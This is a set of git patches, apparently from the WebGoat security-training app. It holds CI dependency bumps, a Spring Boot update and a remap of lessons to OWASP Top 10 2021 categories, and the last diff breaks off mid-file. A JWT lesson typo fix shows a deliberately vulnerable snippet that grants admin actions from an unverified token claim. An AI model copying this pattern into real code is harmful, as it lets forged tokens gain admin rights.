-[![Pull request build](https://github.com/WebGoat/WebGoat/actions/workflows/pr_build.yml/badge.svg?branch=develop)](https://github.com/WebGoat/WebGoat/actions/workflows/pr_build.yml)
+[![Build](https://github.com/WebGoat/WebGoat/actions/workflows/build.yml/badge.svg?branch=develop)](https://github.com/WebGoat/WebGoat/actions/workflows/build.yml)
 [![java-jdk](https://img.shields.io/badge/java%20jdk-17-green.svg)](https://jdk.java.net/)
 [![OWASP Labs](https://img.shields.io/badge/OWASP-Lab%20project-f7b73c.svg)](https://owasp.org/projects/)
 [![GitHub release](https://img.shields.io/github/release/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/releases/latest)

From 4ff41299e3d9bb2a4bb9a5452ac7e5d67730017f Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Mon, 11 Apr 2022 18:14:28 +0200
Subject: [PATCH 139/227] Bump actions/setup-java from 2 to 3 (#1241)

Bumps [actions/setup-java](https://github.com/actions/setup-java) from 2 to 3.
- [Release notes](https://github.com/actions/setup-java/releases)
- [Commits](https://github.com/actions/setup-java/compare/v2...v3)

---
updated-dependencies:
- dependency-name: actions/setup-java
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/build.yml   | 4 ++--
 .github/workflows/release.yml | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 97d830774..4551b79b5 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -36,7 +36,7 @@ jobs:
     steps:
       - uses: actions/checkout@v2
       - name: Set up JDK 17
-        uses: actions/setup-java@v2
+        uses: actions/setup-java@v3
         with:
           distribution: 'temurin'
           java-version: 17
@@ -57,7 +57,7 @@ jobs:
     steps:
         - uses: actions/checkout@v2
         - name: set up JDK 17
-          uses: actions/setup-java@v2
+          uses: actions/setup-java@v3
           with:
               distribution: 'temurin'
               java-version: 17
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 15bd307b8..3426c03b5 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -18,7 +18,7 @@ jobs:
         uses: dawidd6/action-get-tag@v1
 
       - name: Set up JDK 15
-        uses: actions/setup-java@v2
+        uses: actions/setup-java@v3
         with:
           distribution: 'zulu'
           java-version: 15
@@ -118,7 +118,7 @@ jobs:
           token: ${{ secrets.WEBGOAT_DEPLOYER_TOKEN }}
 
       - name: Set up JDK 17
-        uses: actions/setup-java@v2
+        uses: actions/setup-java@v3
         with:
           java-version: 17
           architecture: x64

From 1dadf20ee07a8f0977a1a6d4b495494af48dfddc Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Mon, 11 Apr 2022 18:14:42 +0200
Subject: [PATCH 140/227] Bump actions/checkout from 2 to 3 (#1240)

Bumps [actions/checkout](https://github.com/actions/checkout) from 2 to 3.
- [Release notes](https://github.com/actions/checkout/releases)
- [Changelog](https://github.com/actions/checkout/blob/main/CHANGELOG.md)
- [Commits](https://github.com/actions/checkout/compare/v2...v3)

---
updated-dependencies:
- dependency-name: actions/checkout
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/build.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 4551b79b5..7c7b65d1e 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -34,7 +34,7 @@ jobs:
       matrix:
         os: [ubuntu-latest, windows-latest, macos-latest]
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v3
       - name: Set up JDK 17
         uses: actions/setup-java@v3
         with:
@@ -55,7 +55,7 @@ jobs:
     runs-on: ubuntu-latest
     name: "Branch build"
     steps:
-        - uses: actions/checkout@v2
+        - uses: actions/checkout@v3
         - name: set up JDK 17
           uses: actions/setup-java@v3
           with:

From bc91ca86e8f91c472e6603b171672619181fbf0a Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Mon, 11 Apr 2022 18:14:54 +0200
Subject: [PATCH 141/227] Bump actions/cache from 2.1.7 to 3.0.2 (#1239)

Bumps [actions/cache](https://github.com/actions/cache) from 2.1.7 to 3.0.2.
- [Release notes](https://github.com/actions/cache/releases)
- [Changelog](https://github.com/actions/cache/blob/main/RELEASES.md)
- [Commits](https://github.com/actions/cache/compare/v2.1.7...v3.0.2)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/build.yml   | 4 ++--
 .github/workflows/release.yml | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 7c7b65d1e..5a6d72d83 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -42,7 +42,7 @@ jobs:
           java-version: 17
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v2.1.7
+        uses: actions/cache@v3.0.2
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
@@ -63,7 +63,7 @@ jobs:
               java-version: 17
               architecture: x64
         - name: Cache Maven packages
-          uses: actions/cache@v2.1.7
+          uses: actions/cache@v3.0.2
           with:
               path: ~/.m2
               key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 3426c03b5..102d444bb 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -25,7 +25,7 @@ jobs:
           architecture: x64
 
       - name: Cache Maven packages
-        uses: actions/cache@v3
+        uses: actions/cache@v3.0.2
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}

From 02c3f9551fcb9a6f71c86c2743bb7a9f223a4e2e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Mon, 11 Apr 2022 21:12:10 +0200
Subject: [PATCH 142/227] update spring boot (#1242)

---
 pom.xml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/pom.xml b/pom.xml
index 172788d01..d9554ac96 100644
--- a/pom.xml
+++ b/pom.xml
@@ -11,7 +11,7 @@
     <parent>
         <groupId>org.springframework.boot</groupId>
         <artifactId>spring-boot-starter-parent</artifactId>
-        <version>2.6.2</version>
+        <version>2.6.6</version>
     </parent>
 
     <name>WebGoat</name>
@@ -140,7 +140,7 @@
         <maven-source-plugin.version>3.1.0</maven-source-plugin.version>
         <maven-surefire-plugin.version>3.0.0-M5</maven-surefire-plugin.version>
         <pmd.version>3.15.0</pmd.version>
-        <thymeleaf.version>3.0.14.RELEASE</thymeleaf.version>
+        <thymeleaf.version>3.0.15.RELEASE</thymeleaf.version>
         <webdriver.version>4.3.1</webdriver.version>
         <wiremock.version>2.27.2</wiremock.version>
         <xml-resolver.version>1.2</xml-resolver.version>

From b32240f96bfc3ddd547f686a27de91f99d8220b5 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Mon, 11 Apr 2022 21:12:41 +0200
Subject: [PATCH 143/227] owasp top10-2021 (#1235)

---
 .../webgoat/container/lessons/Category.java   | 37 +++++--------------
 .../lessons/auth_bypass/AuthBypass.java       |  2 +-
 .../lessons/cryptography/Cryptography.java    |  2 +-
 .../org/owasp/webgoat/lessons/csrf/CSRF.java  |  2 +-
 .../InsecureDeserialization.java              |  2 +-
 .../lessons/hijacksession/HijackSession.java  |  2 +-
 .../org/owasp/webgoat/lessons/idor/IDOR.java  |  2 +-
 .../lessons/insecure_login/InsecureLogin.java |  2 +-
 .../org/owasp/webgoat/lessons/jwt/JWT.java    |  2 +-
 .../webgoat/lessons/logging/LogSpoofing.java  |  2 +-
 .../lessons/missing_ac/MissingFunctionAC.java |  2 +-
 .../lessons/password_reset/PasswordReset.java |  2 +-
 .../lessons/path_traversal/PathTraversal.java |  2 +-
 .../secure_passwords/SecurePasswords.java     |  2 +-
 .../lessons/spoofcookie/SpoofCookie.java      |  2 +-
 .../advanced/SqlInjectionAdvanced.java        |  2 +-
 .../introduction/SqlInjection.java            |  2 +-
 .../mitigation/SqlInjectionMitigations.java   |  2 +-
 .../org/owasp/webgoat/lessons/ssrf/SSRF.java  |  2 +-
 .../VulnerableComponents.java                 |  2 +-
 .../lessons/xss/CrossSiteScripting.java       |  2 +-
 .../xss/CrossSiteScriptingMitigation.java     |  2 +-
 .../xss/stored/CrossSiteScriptingStored.java  |  2 +-
 .../org/owasp/webgoat/lessons/xxe/XXE.java    |  2 +-
 .../service/LessonMenuServiceTest.java        |  4 +-
 .../users/UserTrackerRepositoryTest.java      |  2 +-
 .../VulnerableComponentsLessonTest.java       |  2 -
 27 files changed, 36 insertions(+), 55 deletions(-)

diff --git a/src/main/java/org/owasp/webgoat/container/lessons/Category.java b/src/main/java/org/owasp/webgoat/container/lessons/Category.java
index 238d6fe6d..30cccd889 100644
--- a/src/main/java/org/owasp/webgoat/container/lessons/Category.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/Category.java
@@ -39,36 +39,19 @@ public enum Category {
     INTRODUCTION("Introduction", 5),
     GENERAL("General", 100),
     
-    INJECTION("(A1) Injection", 300),
-    AUTHENTICATION("(A2) Broken Authentication", 302),
-    INSECURE_COMMUNICATION("(A3) Sensitive Data Exposure", 303),
-    XXE("(A4) XML External Entities (XXE)", 304),
-    ACCESS_CONTROL("(A5) Broken Access Control", 305),
-    
-    XSS("(A7) Cross-Site Scripting (XSS)", 307),
-    INSECURE_DESERIALIZATION("(A8) Insecure Deserialization", 308),
-    VULNERABLE_COMPONENTS("(A9) Vulnerable Components", 309),
-    SESSION_MANAGEMENT("(A10) Session Management Flaws", 310),
-    
-    REQUEST_FORGERIES("(A8:2013) Request Forgeries", 318),
+    A1("(A1) Broken Access Control", 301),
+    A2("(A2) Cryptographic Failures", 302),
+    A3("(A3) Injection", 303),
 
+    A5("(A5) Security Misconfiguration", 305),
+    A6("(A6) Vuln & Outdated Components", 306),
+    A7("(A7) Identity & Auth Failure", 307),
+    A8("(A8) Software & Data Integrity", 308),
+    A9("(A9) Security Logging Failures", 309),
+    A10("(A10) Server-side Request Forgery", 310),    
     
-    REQ_FORGERIES("Request Forgeries", 450),
-    
-    INSECURE_CONFIGURATION("Insecure Configuration", 600),
-    INSECURE_STORAGE("Insecure Storage", 800),
-    
-    
-    AJAX_SECURITY("AJAX Security", 1000),
-    BUFFER_OVERFLOW("Buffer Overflows", 1100),
-    CODE_QUALITY("Code Quality", 1200),
-    CONCURRENCY("Concurrency", 1300),
-    ERROR_HANDLING("Improper Error Handling", 1400),
-    DOS("Denial of Service", 1500),
-    MALICIOUS_EXECUTION("Malicious Execution", 1600),
     CLIENT_SIDE("Client side", 1700),
-    WEB_SERVICES("Web Services", 1900),
-    ADMIN_FUNCTIONS("Admin Functions", 2000),
+
     CHALLENGE("Challenges", 3000);
 
     @Getter
diff --git a/src/main/java/org/owasp/webgoat/lessons/auth_bypass/AuthBypass.java b/src/main/java/org/owasp/webgoat/lessons/auth_bypass/AuthBypass.java
index 4e885e1cd..9e0694256 100644
--- a/src/main/java/org/owasp/webgoat/lessons/auth_bypass/AuthBypass.java
+++ b/src/main/java/org/owasp/webgoat/lessons/auth_bypass/AuthBypass.java
@@ -31,7 +31,7 @@ public class AuthBypass extends Lesson {
 
     @Override
     public Category getDefaultCategory() {
-        return Category.AUTHENTICATION;
+        return Category.A7;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/cryptography/Cryptography.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/Cryptography.java
index 6ccd96951..6a805df21 100644
--- a/src/main/java/org/owasp/webgoat/lessons/cryptography/Cryptography.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/Cryptography.java
@@ -30,7 +30,7 @@ import org.springframework.stereotype.Component;
 public class Cryptography extends Lesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.GENERAL;
+        return Category.A2;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRF.java b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRF.java
index 675054d75..624797f66 100644
--- a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRF.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRF.java
@@ -33,7 +33,7 @@ import org.springframework.stereotype.Component;
 public class CSRF extends Lesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.REQUEST_FORGERIES;
+        return Category.A10;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserialization.java b/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserialization.java
index fba6be389..008fb90a2 100644
--- a/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserialization.java
+++ b/src/main/java/org/owasp/webgoat/lessons/deserialization/InsecureDeserialization.java
@@ -37,7 +37,7 @@ import org.springframework.stereotype.Component;
 public class InsecureDeserialization extends Lesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.INSECURE_DESERIALIZATION;
+        return Category.A8;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSession.java b/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSession.java
index 51c3c616a..c233a1d23 100644
--- a/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSession.java
+++ b/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSession.java
@@ -38,7 +38,7 @@ public class HijackSession extends Lesson {
 
     @Override
     public Category getDefaultCategory() {
-        return Category.SESSION_MANAGEMENT;
+        return Category.A1;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/idor/IDOR.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDOR.java
index 5672067aa..38dc2a9eb 100644
--- a/src/main/java/org/owasp/webgoat/lessons/idor/IDOR.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDOR.java
@@ -38,7 +38,7 @@ public class IDOR extends Lesson {
 
     @Override
     public Category getDefaultCategory() {
-        return Category.ACCESS_CONTROL;
+        return Category.A1;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLogin.java b/src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLogin.java
index ec8a29c58..e239a4f8c 100644
--- a/src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLogin.java
+++ b/src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLogin.java
@@ -37,7 +37,7 @@ import org.springframework.stereotype.Component;
 public class InsecureLogin extends Lesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.INSECURE_COMMUNICATION;
+        return Category.A7;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/jwt/JWT.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWT.java
index 31a84a4ad..d65b566c1 100644
--- a/src/main/java/org/owasp/webgoat/lessons/jwt/JWT.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWT.java
@@ -35,7 +35,7 @@ public class JWT extends Lesson {
 
     @Override
     public Category getDefaultCategory() {
-        return Category.AUTHENTICATION;
+        return Category.A7;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofing.java b/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofing.java
index eed7bea87..ec5c814fb 100644
--- a/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofing.java
+++ b/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofing.java
@@ -37,7 +37,7 @@ import org.springframework.stereotype.Component;
 public class LogSpoofing extends Lesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.INSECURE_CONFIGURATION;
+        return Category.A9;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionAC.java b/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionAC.java
index 2992a9a69..609745ee2 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionAC.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionAC.java
@@ -34,7 +34,7 @@ public class MissingFunctionAC extends Lesson {
 
     @Override
     public Category getDefaultCategory() {
-        return Category.ACCESS_CONTROL;
+        return Category.A1;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordReset.java b/src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordReset.java
index 502140c32..a0024f033 100644
--- a/src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordReset.java
+++ b/src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordReset.java
@@ -30,7 +30,7 @@ import org.springframework.stereotype.Component;
 public class PasswordReset extends Lesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.AUTHENTICATION;
+        return Category.A7;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/path_traversal/PathTraversal.java b/src/main/java/org/owasp/webgoat/lessons/path_traversal/PathTraversal.java
index 4cacd14cd..703aa30ea 100644
--- a/src/main/java/org/owasp/webgoat/lessons/path_traversal/PathTraversal.java
+++ b/src/main/java/org/owasp/webgoat/lessons/path_traversal/PathTraversal.java
@@ -31,7 +31,7 @@ public class PathTraversal extends Lesson {
 
     @Override
     public Category getDefaultCategory() {
-        return Category.INJECTION;
+        return Category.A3;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswords.java b/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswords.java
index 872c7c027..37468b20a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswords.java
+++ b/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswords.java
@@ -35,7 +35,7 @@ public class SecurePasswords extends Lesson {
 
     @Override
     public Category getDefaultCategory() {
-        return Category.AUTHENTICATION;
+        return Category.A7;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookie.java b/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookie.java
index fa8f1c946..b89627b42 100644
--- a/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookie.java
+++ b/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookie.java
@@ -37,7 +37,7 @@ public class SpoofCookie extends Lesson {
 
     @Override
     public Category getDefaultCategory() {
-        return Category.SESSION_MANAGEMENT;
+        return Category.A1;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionAdvanced.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionAdvanced.java
index a29241eaf..9a472067e 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionAdvanced.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionAdvanced.java
@@ -30,7 +30,7 @@ import org.springframework.stereotype.Component;
 public class SqlInjectionAdvanced extends Lesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.INJECTION; 
+        return Category.A3; 
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjection.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjection.java
index 459079ed6..dbd855fec 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjection.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjection.java
@@ -30,7 +30,7 @@ import org.springframework.stereotype.Component;
 public class SqlInjection extends Lesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.INJECTION;
+        return Category.A3;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionMitigations.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionMitigations.java
index 08ebb39d6..1fd732c46 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionMitigations.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionMitigations.java
@@ -30,7 +30,7 @@ import org.springframework.stereotype.Component;
 public class SqlInjectionMitigations extends Lesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.INJECTION;
+        return Category.A3;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRF.java b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRF.java
index ac318d3e6..d82cf3d9d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRF.java
+++ b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRF.java
@@ -37,7 +37,7 @@ import org.springframework.stereotype.Component;
 public class SSRF extends Lesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.REQUEST_FORGERIES;
+        return Category.A10;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponents.java b/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponents.java
index 0d444f9aa..228f74cce 100644
--- a/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponents.java
+++ b/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponents.java
@@ -30,7 +30,7 @@ import org.springframework.stereotype.Component;
 public class VulnerableComponents extends Lesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.VULNERABLE_COMPONENTS;
+        return Category.A6;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScripting.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScripting.java
index ca0f14c0a..308ff6221 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScripting.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScripting.java
@@ -30,7 +30,7 @@ import org.springframework.stereotype.Component;
 public class CrossSiteScripting extends Lesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.XSS;
+        return Category.A3;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingMitigation.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingMitigation.java
index dba6c36d0..2515d7e0c 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingMitigation.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingMitigation.java
@@ -28,7 +28,7 @@ import org.owasp.webgoat.container.lessons.Lesson;
 public class CrossSiteScriptingMitigation extends Lesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.XSS;
+        return Category.A3;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/stored/CrossSiteScriptingStored.java b/src/main/java/org/owasp/webgoat/lessons/xss/stored/CrossSiteScriptingStored.java
index 90cb74f32..5646f7622 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/stored/CrossSiteScriptingStored.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/stored/CrossSiteScriptingStored.java
@@ -28,7 +28,7 @@ import org.owasp.webgoat.container.lessons.Lesson;
 public class CrossSiteScriptingStored extends Lesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.XSS;
+        return Category.A3;
     }
 
     @Override
diff --git a/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java b/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
index 8a9ab9679..76d51f78f 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
@@ -31,7 +31,7 @@ public class XXE extends Lesson {
 
     @Override
     public Category getDefaultCategory() {
-        return Category.XXE;
+        return Category.A5;
     }
 
     @Override
diff --git a/src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java b/src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java
index 593f27539..d889e2665 100644
--- a/src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java
+++ b/src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java
@@ -77,7 +77,7 @@ public class LessonMenuServiceTest {
         when(l2.getTitle()).thenReturn("AA");
         when(lessonTracker.isLessonSolved()).thenReturn(false);
         when(course.getLessons(any())).thenReturn(Lists.newArrayList(l1, l2));
-        when(course.getCategories()).thenReturn(Lists.newArrayList(Category.ACCESS_CONTROL));
+        when(course.getCategories()).thenReturn(Lists.newArrayList(Category.A1));
         when(userTracker.getLessonTracker(any(Lesson.class))).thenReturn(lessonTracker);
         when(userTrackerRepository.findByUser(any())).thenReturn(userTracker);
 
@@ -93,7 +93,7 @@ public class LessonMenuServiceTest {
         when(l1.getTitle()).thenReturn("ZA");
         when(lessonTracker.isLessonSolved()).thenReturn(true);
         when(course.getLessons(any())).thenReturn(Lists.newArrayList(l1));
-        when(course.getCategories()).thenReturn(Lists.newArrayList(Category.ACCESS_CONTROL));
+        when(course.getCategories()).thenReturn(Lists.newArrayList(Category.A1));
         when(userTracker.getLessonTracker(any(Lesson.class))).thenReturn(lessonTracker);
         when(userTrackerRepository.findByUser(any())).thenReturn(userTracker);
 
diff --git a/src/test/java/org/owasp/webgoat/container/users/UserTrackerRepositoryTest.java b/src/test/java/org/owasp/webgoat/container/users/UserTrackerRepositoryTest.java
index 7da75dc92..9caa0ab2b 100644
--- a/src/test/java/org/owasp/webgoat/container/users/UserTrackerRepositoryTest.java
+++ b/src/test/java/org/owasp/webgoat/container/users/UserTrackerRepositoryTest.java
@@ -20,7 +20,7 @@ class UserTrackerRepositoryTest {
 
         @Override
         public Category getDefaultCategory() {
-            return Category.AJAX_SECURITY;
+            return Category.CLIENT_SIDE;
         }
 
         @Override
diff --git a/src/test/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLessonTest.java b/src/test/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLessonTest.java
index dd47a1400..b52953a11 100644
--- a/src/test/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLessonTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLessonTest.java
@@ -26,8 +26,6 @@ import com.thoughtworks.xstream.XStream;
 import com.thoughtworks.xstream.io.StreamException;
 import org.junit.jupiter.api.Disabled;
 import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.lessons.vulnerable_components.Contact;
-import org.owasp.webgoat.lessons.vulnerable_components.ContactImpl;
 
 import static org.junit.jupiter.api.Assertions.assertNotNull;
 import static org.junit.jupiter.api.Assertions.assertThrows;

From dfa31e0a28783ef89c5888131917fed000fe3397 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Wed, 20 Apr 2022 08:16:21 +0200
Subject: [PATCH 144/227] JWT doc code typo fix (#1247)

---
 .../lessons/jwt/documentation/JWT_libraries_assignment.adoc     | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/main/resources/lessons/jwt/documentation/JWT_libraries_assignment.adoc b/src/main/resources/lessons/jwt/documentation/JWT_libraries_assignment.adoc
index 33e6418f6..89507f79a 100644
--- a/src/main/resources/lessons/jwt/documentation/JWT_libraries_assignment.adoc
+++ b/src/main/resources/lessons/jwt/documentation/JWT_libraries_assignment.adoc
@@ -46,7 +46,7 @@ try {
    Jwt jwt = Jwts.parser().setSigningKey(JWT_PASSWORD).parse(accessToken);
    Claims claims = (Claims) jwt.getBody();
    String user = (String) claims.get("user");
-   booelean isAdmin = Boolean.valueOf((String) claims.get("admin"));
+   boolean isAdmin = Boolean.valueOf((String) claims.get("admin"));
    if (isAdmin) {
      removeAllUsers();
    } else {

From 3c0b243797ffa398bc79f2e911b6599c47a8e93c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Fri, 6 May 2022 07:34:49 +0200
Subject: [PATCH 145/227] Added new active developer (#1249)

Fix footer
---
 src/main/resources/webgoat/static/css/main.css  | 2 +-
 src/main/resources/webgoat/templates/about.html | 1 +
 2 files changed, 2 insertions(+), 1 deletion(-)

diff --git a/src/main/resources/webgoat/static/css/main.css b/src/main/resources/webgoat/static/css/main.css
index e380e781c..78faf49a4 100644
--- a/src/main/resources/webgoat/static/css/main.css
+++ b/src/main/resources/webgoat/static/css/main.css
@@ -745,7 +745,7 @@ fieldset[disabled] .btn-warning.active {
 }
 
 .modal .modal-body.modal-scroll {
-    max-height: 375px;
+    max-height: auto;
     overflow-y: scroll auto;
 }
 
diff --git a/src/main/resources/webgoat/templates/about.html b/src/main/resources/webgoat/templates/about.html
index c7bdcd08f..3df5864cb 100644
--- a/src/main/resources/webgoat/templates/about.html
+++ b/src/main/resources/webgoat/templates/about.html
@@ -53,6 +53,7 @@
